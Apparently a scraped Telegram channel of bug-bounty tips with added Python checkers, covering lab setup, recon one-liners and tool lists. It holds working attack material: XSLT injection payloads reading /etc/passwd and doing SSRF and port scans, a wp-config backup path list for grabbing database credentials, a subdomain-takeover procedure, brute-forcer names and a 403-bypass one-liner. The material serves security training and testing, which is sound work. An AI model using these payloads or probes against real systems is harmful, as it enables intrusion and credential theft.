Brut Security
✅Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: [email protected]
bugbounty-v1.1.zip
Bugbounty Practice Lab by TCM Security. Follow this guide to set it up in Kali Linux!

Step 1: Install the required packages
sudo apt update
sudo apt upgrade
sudo apt install docker.io
sudo apt install docker-compose
Restart your Kali VM.

Step 2: Unpack the labs
Copy the archive to a directory on your system (e.g. /home/kali/labs) and unzip it (use the file name of the archive you downloaded):
cd /home/kali/labs
unzip bugbounty-v1.0.zip

cd bugbounty
sudo docker-compose up
The first time you run this it will take some time because it needs to download the Docker images to your machine. Next time you run it, it should only take 5-30 seconds.

Step 3: Set up permissions
In a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is needed for labs that require write access, such as the file upload attacks.
./set-permissions.sh

Browse to https://localhost
The first time you load the lab the database needs to be initialized: follow the instructions in the red box by clicking the link, then come back to the homepage.
Enjoy your labs!
🚨Here is a list of WP-exposed (wp-config sensitive) files!🚨

Backup, editor swap and renamed copies of wp-config.php are served as plain text instead of being executed by PHP, so any hit hands you the database credentials and the AUTH_KEY/SALT values. Probe each path relative to the WordPress root:

/wp-config.php-backup
/wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php
/wp-config.inc
/wp-config.old
/wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json

Note that wp-config-sample.php ships with every WordPress install and only contains placeholder values, so a hit there is not a finding on its own.
πŸ‘10❀3πŸ”₯3
👉NipeJS is a tool designed to detect JavaScript leaks through precise regex pattern scanning, streamlining the identification of potential data leaks within code.

📥https://github.com/i5nipe/nipejs
🚨Tools collection🚨

Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source code (JS files, sitemaps, config files)
5. knockpy
6. subfinder
7. aquatone
8. SubDomainizer
9. altdns
10. SecurityTrails API

Bruteforcing tools we can use!
1. gobuster
2. dirsearch
3. ssb - SSH brute-forcer
4. Callow - customizable login brute-forcer
5. Ncrack - network services

Spidering tools we can use!
1. Spider/Crawler in Burp
2. ParamSpider
3. Scrapy
4. gospider
5. aspider
6. ParamPamPam

Dir enum tools we can use!
1. dirb
2. gobuster
3. dirsearch

Wordlists we can use!
1. SecLists
2. Assetnote
πŸ‘14❀7πŸ”₯3
This media is not supported in your browser
VIEW IN TELEGRAM
How to find Broken Access Control (missing authorization) in 30 seconds or less using Autorize

👉Setup Your Autorize in Burp

1. Proxy traffic through Burp and, in Autorize's configuration, paste the session cookie of a low-privileged user (leave it empty to test only unauthenticated access)
2. Browse the application as a high-privileged user
3. Select requests -> Extensions -> Autorize -> Send to Autorize (each request is replayed with the low-privileged cookie and with no session at all)
4. Check the "Unauthenticated" tab and column: "Bypassed!" means the response without a session matched the privileged one
πŸ‘8πŸ”₯2
🌟Load Balancer Takeover🌟

Step 1: Identify CNAME records pointing to *.trafficmanager.net whose target no longer resolves (NXDOMAIN): the Traffic Manager profile was deleted but the owner's DNS record still points at it. 🕵️‍♂️

Step 2: In your own Azure subscription, create a Traffic Manager profile whose DNS name is exactly that dangling label (it must still be free to register). 🌐

Step 3: The victim hostname now resolves through its CNAME to the profile you control. 🛠️

Step 4: Add an endpoint so the hostname redirects to your desired (proof-of-concept) site. 🔄
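An added check for Step 1, not from the post: given hostnames and their CNAME targets (from your subdomain enumeration output), it keeps only targets under trafficmanager.net that no longer resolve. The resolver is injectable so the constructed example below runs offline; the real one uses the system resolver. Function names and the sample records are mine.

```python
import socket


def resolves(name):
    """True if the system resolver returns an address, False on NXDOMAIN / no answer."""
    try:
        socket.gethostbyname(name)
        return True
    except socket.gaierror:
        return False


def dangling_traffic_manager(cnames, resolve=resolves):
    """cnames: {hostname: cname_target}. Return [(hostname, target)] takeover candidates.

    NXDOMAIN on a *.trafficmanager.net target is necessary but not sufficient:
    Azure must also still let you create a profile with that exact label.
    """
    out = []
    for host, target in cnames.items():
        t = target.rstrip(".").lower()          # normalise trailing dot / case
        if t.endswith(".trafficmanager.net") and not resolve(t):
            out.append((host, t))
    return out


# Constructed records for the example (not real domains).
SAMPLE_CNAMES = {
    "app.example.com": "old-app.trafficmanager.net.",   # profile deleted -> candidate
    "www.example.com": "live.trafficmanager.net",       # still resolves -> fine
    "cdn.example.com": "x.azureedge.net",               # not Traffic Manager -> ignored here
}
FAKE_LIVE = {"live.trafficmanager.net"}


def fake_resolve(name):
    """Offline stand-in for resolves() used by the example."""
    return name in FAKE_LIVE


if __name__ == "__main__":
    print(dangling_traffic_manager(SAMPLE_CNAMES, resolve=fake_resolve))
```

Run it with the default resolver against real enumeration output; each candidate still has to be confirmed by attempting to create the profile in the Azure portal.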
🌟XSLT Server Side Injection🌟
(Extensible Stylesheet Language Transformations) - Part 1

The most used processors are: libxslt (Gnome; behind PHP's XSLTProcessor and Python's lxml), Xalan (Apache) and Saxon (Saxonica). Which payload works depends on the processor: libxslt and Xalan only implement XSLT 1.0, so unparsed-text() (an XSLT 2.0 function) needs Saxon, while document() and xsl:include work everywhere. The namespace URI must be exactly http://www.w3.org/1999/XSL/Transform or the processor will not treat the document as a stylesheet.

1. Read Local File: read.xsl (unparsed-text() reads any text file; XSLT 2.0, so Saxon)
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
On an XSLT 1.0 processor use document('file:///path/to/file.xml') instead; it only loads well-formed XML, so go for config files rather than /etc/passwd.

2. SSRF (the processor fetches the href while parsing the stylesheet; even when the response is not valid XSLT the request has already gone out, so this works blind)
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>

OR, where an ESI processor (CDN/cache) sits in front of the app, make it fetch and apply your stylesheet:

<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10/news_template.xsl">
</esi:include>

3. Javascript Injection (the script is copied into the transformed HTML, so this is XSS in whoever renders the output)
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>

4. Port Scan (document() connects to host:port; the error message or the response time tells an open port from a closed one)
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
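An added pre-flight check, not from the post: it parses an untrusted stylesheet with the standard library and flags the four constructs above (xsl:include/xsl:import, document() and unparsed-text() in XPath attributes, a literal <script> in the output, and the PHP extension namespace that php:function needs) before the file is ever handed to libxslt or Saxon. The function name and the benign stylesheet are mine; the risky samples are the payloads from the post with the corrected namespace.

```python
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# Calls that make the processor touch the filesystem/network or call into PHP.
RISKY_CALL = re.compile(r"\b(document|unparsed-text|php:function(?:String)?)\s*\(")
PHP_NS = re.compile(r'xmlns:\w+\s*=\s*"http://php\.net/xsl"')


def audit_xslt(stylesheet_text):
    """Return a list of findings for an untrusted stylesheet (empty list = nothing risky seen)."""
    findings = []
    root = ET.fromstring(stylesheet_text.encode("utf-8"))
    for elem in root.iter():
        ns, _, local = elem.tag.rpartition("}")   # "{uri}local" -> ("{uri", "}", "local")
        ns = ns.lstrip("{")
        if ns == XSL_NS and local in ("include", "import"):
            findings.append(f"xsl:{local} href={elem.get('href')!r} (fetches a URL: SSRF / file read)")
        if ns != XSL_NS and local.lower() == "script":
            findings.append("literal <script> in output (XSS when the result is rendered)")
        for attr in ("select", "test", "match", "name"):
            value = elem.get(attr)
            if value and RISKY_CALL.search(value):
                findings.append(f"{attr}={value!r}")
    if PHP_NS.search(stylesheet_text):
        findings.append("PHP extension namespace declared (php:function RCE if registerPHPFunctions() is on)")
    return findings


# Sample stylesheets: the post's payloads (namespace corrected) plus one benign sheet.
READ_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/"><xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/></xsl:template>
</xsl:stylesheet>"""
SSRF_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/"></xsl:template>
</xsl:stylesheet>"""
JS_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/"><script>confirm("We're good");</script></xsl:template>
</xsl:stylesheet>"""
PORTSCAN_XSL = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/"><xsl:value-of select="document('http://example.com:22')"/></xsl:template>
</xsl:stylesheet>"""
BENIGN_XSL = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/"><html><body><xsl:value-of select="/report/title"/></body></xsl:template>
</xsl:stylesheet>""".replace("</body></xsl:template>", "</body></html></xsl:template>")

if __name__ == "__main__":
    for name, sheet in (("read", READ_XSL), ("ssrf", SSRF_XSL), ("js", JS_XSL),
                        ("portscan", PORTSCAN_XSL), ("benign", BENIGN_XSL)):
        print(name, audit_xslt(sheet))
```

A static check like this is a tripwire, not a sandbox: the real fix is to never accept stylesheets from users, or to run the processor with file and network access disabled (lxml's XSLTAccessControl, Saxon's configuration).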
🌟Find JS Endpoints With 1-Click🌟

1. Add a blank bookmark in your browser.
2. Paste the bookmarklet code from https://0-a.nl/jsendpoints.txt (a regex-based JS endpoint extractor) into the URL field.
3. Now open any site and click on your bookmark!
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
πŸ‘6πŸ”₯4
This media is not supported in your browser
VIEW IN TELEGRAM
USB Forensics 🤯🤯
XSS Checks Made Easy 🌐

Example: Execute XSS checks on a list of URLs with a single command.

One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt


Uncover Hidden Parameters in Seconds 🕵️‍♂️

Example: Extract the names of hidden form inputs from every live URL (-skL: -k ignores TLS errors, -L follows redirects; lowercase -l is an FTP option and does nothing here).

One-Liner:
cat alive.txt | rush 'curl -skL "{}" | grep "type=\"hidden\"" | grep -Eo "name=\"[^\"]+\"" | cut -d"\"" -f2 | sort -u' | anew params.txt


Reveal Secrets in JavaScript Files 🕵️‍♂️

Example: Identify sensitive data (API keys, tokens) in JavaScript files. The flags below are hakrawler 1.x syntax; hakrawler 2.x reads URLs from stdin and uses -d for depth.

One-Liner:
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder


Crush Directories with Effortless Bruteforce 🔍

Example: Discover hidden directories and files on every live host. -ac auto-calibrates the filter so soft-404s are dropped; lower -t 200 on targets with rate limiting.

One-Liner:
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt


Expose Log4J Vulnerabilities with Ease 🔍

Example: Run log4j-scan against every live host.

One-Liner:
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @'


Hunt Down Sneaky Open Redirects 🎯

Example: Uncover open redirects. Export LHOST first (export LHOST=https://your-callback-host); qsreplace puts it into every query parameter value and the grep only fires when the server actually redirects there.

One-Liner:
gau vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'


Capture Screenshots in a Snap 📷

Example: Capture screenshots of live websites (assetfinder takes a bare domain; gowitness single is the 2.x syntax).

One-Liner:
assetfinder -subs-only target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'


Know Your WordPress Version 📝

Example: Discover the WordPress version of a target website instantly (readme.html is often left in place; the meta generator tag on the homepage is the fallback).

One-Liner:
curl -s 'https://target.com/readme.html' | grep 'Version'


Unearth Subdomains Containing JavaScript 🌐

Example: Find subdomains that serve JavaScript files (haktrails needs a SecurityTrails API key in its config).

One-Liner:
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS


Bypass 403 Login Pages with Finesse 🚪

Example: Find /login pages that answer 401/403, then re-request them as //login; proxies and path-based ACLs that normalise the path differently from the backend let the double slash through.

One-Liner:
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
πŸ‘6πŸ”₯3
This media is not supported in your browser
VIEW IN TELEGRAM
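An added, more robust version of the hidden-parameter one-liner above, not from the post: the grep chain only matches type="hidden" with double quotes and with name after type on the same line, while a real HTML parser picks up single-quoted, unquoted and reordered attributes too. The class and function names are mine and the form below is constructed for the example; fetching the pages is left to curl/httpx as in the post.

```python
from html.parser import HTMLParser


class HiddenInputCollector(HTMLParser):
    """Collects the name of every <input type="hidden"> regardless of quoting or attribute order."""

    def __init__(self):
        super().__init__()
        self.names = set()

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        # attrs is a list of (name, value); value is None for bare attributes.
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.names.add(a["name"])


def hidden_params(html_text):
    """Return the sorted, de-duplicated hidden input names found in an HTML document."""
    parser = HiddenInputCollector()
    parser.feed(html_text)
    parser.close()
    return sorted(parser.names)


# Constructed page: every quoting style the grep one-liner trips over.
SAMPLE_HTML = """
<form method="post" action="/account/update">
  <input type="hidden" name="_csrf" value="abc123">
  <input name='user_id' value='42' TYPE='hidden'>
  <input type="text" name="display_name">
  <input type=hidden name=next value=/dashboard />
  <input type="hidden" value="orphan">
</form>
"""

if __name__ == "__main__":
    import sys
    # Usage: curl -skL https://target | python3 hidden_params.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_HTML
    print("\n".join(hidden_params(data)))
```

user_id and next are exactly the parameters the grep version misses; they are also the ones worth fuzzing for IDOR and open redirect.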
🌟Fuzzing and Bypassing the AWS WAF to trigger XSS🌟

πŸ‘‰Tool - https://lnkd.in/gk4-_4yw
πŸ‘‰Blog - https://lnkd.in/g4W7eA7R
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf

Authentication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf

OAuth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html

File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf

IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b

XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet

XXE-https://link.medium.com/lprTDcXRYgb

SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery

2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view

CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration

Business Logic Flaws-https://link.medium.com/MX5hzfESYgb

CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery

Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/

Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning

HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding

Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

SAML-https://github.com/e11i0t4lders0n/SAML-SSO

Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html

S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007

Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection

WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
πŸ‘10πŸ”₯4❀3